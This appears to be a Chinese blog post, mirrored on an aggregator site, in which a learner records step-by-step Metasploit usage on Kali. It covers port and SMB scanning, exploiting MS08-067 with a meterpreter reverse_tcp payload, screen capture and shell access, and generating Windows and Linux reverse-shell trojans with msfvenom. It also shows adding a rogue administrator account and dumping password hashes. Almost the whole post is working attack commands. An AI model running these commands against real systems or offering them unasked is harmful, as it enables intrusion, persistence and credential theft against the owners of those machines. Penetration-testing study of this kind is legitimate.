zoukankan      html  css  js  c++  java
  • Kali的msf模块利用之我的理解

    题记

           Cracer的教学视频快看完了,对于基础的学习还是十分有帮助的,还是要多看看大佬们写的骚姿势文章。最近补天申请了个团队,原来人家是别的平台转过来的,太尴尬了,还要求一月10个洞,激励一下自己吧,挖不完我就退了。哎,补天真是太严格了,全校师生的学号姓名专业信息泄露给算了低危,闻者伤心,见者流泪。

           Msf模块终于有了新的理解,以前只会生成个木马和利用。学习之路还很长啊,还是系统性的学一下cs吧。Msf第一次利用需要安装数据库。

           netstat -tnlp 查看运行的端口

    扫端口模块

           1、msfconsole

           2、search portscan 搜索扫描端口的模块

           3、show auxiliary 展示auxiliary下有什么模块(有好多)

           4、use auxiliary/scanner/portscan/syn 使用这个模块

           5、show options 展示需要填充的内容

           6、set ports 21-25,80-90,135,139,445,1433,3306,3389设置变量

           7、setg rhosts 192.168.3.0/24 设置目标

           8、setg threads 50 线程调高

           9、run

    特定服务扫描(其他服务类似)setg全局设置

           1、search smb_version

           2、use auxiliary/scanner/smb/smb_version

           3、show options

           4、setg rhosts 192.168.3.0/24

           5、setg threads 50

           6、run

    按照漏洞编号对端口进行攻击

           1、search ms08_067 有哪个漏洞去网上搜漏洞编号

           2、use exploit/windows/smb/ms08_067_netapi

           3、 set rhost目标ip

           4、show target

           5、set target 34

           6、 set payload windows/meterpreter/reverse_tcp 利用成功后调用msf平台反弹会话

           7、show options

           8、setg lhost 本地ip

           9、set lport 本地端口

           10、exploit

           漏洞利用成功会弹出meterpreter模块

           1、ps 查看正在运行的进程

           2、migrate 1404 迁移进程,最好找个具有系统权限的进程

           3、run vnc 可以监控屏幕

           4、screenshot 截屏

           5、shell 操作对方cmd

    制作木马上传并运行反弹shell

           1、msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.3.118 lport=1311 -f exe > /root/x.exe 生成windows木马

           Msfvenom -p linux/merterpreter/reverse_tcp lhost=192.168.3.118 lport=1312 -f elf < /root/linux 生成linux木马

           2、use exploit/multi/handler 开启监听

           3、set payload windows/meterpreter/reverse_tcp

           4、set lhost 192.168.3.118

           5、set lport 1311

           6、show options

           7、exploit

           8、监听开启后,让木马在目标上运行,获得控制权限。

           获得权限后

           1、ps

           2、shell 调出cmd创建用户

           3、net user cc 123.com /add

           4、net localgroup adminstrators cc /add

           5、migrate 1388

           6、hashdump

           如果获得多个计算机的权限可以

           1、background 把当前权限放到后台

           2、sessions -l 查看有几个权限

           3、session -i 1 切换权限

  • 相关阅读:
    快速指引(CDH6.3.2)
    gRpc 跨语言调用(NetCore 与 Spring Boot)
    Windows 极简利器
    Jenkins 于Docker 中源配置
    Kettle 问题
    在 Ubuntu 下直接将二进制文件制作成 rpm 包
    麒麟常见问题
    基于jssip的简单封装
    带有handleEvent的eventEmitter
    js集锦
  • 原文地址:https://www.cnblogs.com/sunny11/p/14192986.html
Copyright © 2011-2022 走看看